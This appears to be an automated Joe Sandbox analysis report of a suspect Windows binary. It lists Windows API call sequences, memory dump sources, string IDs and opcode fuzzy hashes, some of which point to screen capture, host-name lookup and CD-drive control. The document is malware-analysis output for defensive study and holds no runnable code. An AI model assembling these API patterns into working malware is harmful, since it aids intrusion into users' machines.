                                                                                                                                                    • SendMessageW.USER32 ref: 00471740
                                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                                                                                                                                                    • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                                                                                                                                                    • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                                                                                                                                                    • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                                                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                                                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                                                                                                                                                    • SendMessageW.USER32 ref: 0047184F
                                                                                                                                                    • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                                                                                                                                                    • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                                                                                                                                                    • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                                                                                                                                                    • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                     • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4116747274-0
                                                                                                                                                    • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                                                                                                    • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                                                                                                                                                    • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                                                                                                    • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                                                                                                                                                    APIs
                                                                                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                                                                                                                                                    • _wcslen.LIBCMT ref: 00461683
                                                                                                                                                    • __swprintf.LIBCMT ref: 00461721
                                                                                                                                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                                                                                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                                                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 00461869
                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 004618A4
                                                                                                                                                    • GetParent.USER32(?), ref: 004618C3
                                                                                                                                                    • ScreenToClient.USER32(00000000), ref: 004618CA
                                                                                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                                                                                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                     • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                                                                                                                                    • String ID: %s%u
                                                                                                                                                    • API String ID: 1899580136-679674701
                                                                                                                                                    • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                                                                                                                    • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                                                                                                                                                    • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                                                                                                                    • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                                                                                                                                                    APIs
                                                                                                                                                    • GetDC.USER32(00000000), ref: 0043143E
                                                                                                                                                    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00431466
                                                                                                                                                    • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                                                                                                                                    • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                                                                                                                    • String ID: (
                                                                                                                                                    • API String ID: 3300687185-3887548279
                                                                                                                                                    • Opcode ID: cfc1d8c6a0823e7a49ed36632b2cd954b4a10292cfc1fb15d36a0f99b3ff0906
                                                                                                                                                    • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                                                                                                                                                    • Opcode Fuzzy Hash: cfc1d8c6a0823e7a49ed36632b2cd954b4a10292cfc1fb15d36a0f99b3ff0906
                                                                                                                                                    • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                                                                                                      • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                                                                                                    • GetDriveTypeW.KERNEL32 ref: 0045DB32
                                                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                                                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                                                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                                                                                                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                                                                                                                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                    • API String ID: 1976180769-4113822522
                                                                                                                                                    • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                                                                                                    • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                                                                                                                                                    • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                                                                                                    • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 461458858-0
                                                                                                                                                    • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                                                                                                    • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                                                                                                                                                    • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                                                                                                    • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                                                                                                                                    APIs
                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                                                                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00430113
                                                                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                                                                                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00430150
                                                                                                                                                    • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                                                                                                                                    • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 004301D0
                                                                                                                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3969911579-0
                                                                                                                                                    • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                                                                                                    • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                                                                                                                                    • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                                                                                                    • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                                                                                                                                                    • String ID: 0
                                                                                                                                                    • API String ID: 956284711-4108050209
                                                                                                                                                    • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                                                                                                    • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                                                                                                                                                    • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                                                                                                    • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
• String ID: 0.0.0.0
• API String ID: 1965227024-3771769585
• Opcode ID: 7f5a35a4caea2a0363244511447d860b497c1f3f6669415181c210b9a0992ba1
• Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
• Opcode Fuzzy Hash: 7f5a35a4caea2a0363244511447d860b497c1f3f6669415181c210b9a0992ba1
• Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
APIs
  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
• mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
• mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
• mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
• mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
• mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: SendString$_memmove_wcslen
• String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
• API String ID: 369157077-1007645807
• Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
• Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
• Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
• Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
APIs
• GetParent.USER32 ref: 00445BF8
• GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
• __wcsicoll.LIBCMT ref: 00445C33
• __wcsicoll.LIBCMT ref: 00445C4F
• SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: __wcsicoll$ClassMessageNameParentSend
• String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
• API String ID: 3125838495-3381328864
• Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
• Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
• Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
• Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
APIs
• SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
• SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
• CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
• SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
• SendMessageW.USER32(?,?,00000000,?), ref: 00449332
• SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
• SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
• SendMessageW.USER32(?,00000402,?), ref: 00449399
• SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
• SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: MessageSend$CharNext
• String ID:
• API String ID: 1350042424-0
• Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
• Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
• Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
• Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
APIs
  • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
  • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
• GetDriveTypeW.KERNEL32(?), ref: 004787B9
• _wcscpy.LIBCMT ref: 004787E5
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: BuffCharDriveLowerType_wcscpy_wcslen
• String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
• API String ID: 3052893215-2127371420
• Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
• Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
• Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
• Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
APIs
• LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
• __swprintf.LIBCMT ref: 0045E7F7
• _wprintf.LIBCMT ref: 0045E8B3
• _wprintf.LIBCMT ref: 0045E8D7
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: LoadString_wprintf$__swprintf_memmove_wcslen
• String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
• API String ID: 2295938435-2354261254
• Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
• Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
• Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
• Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
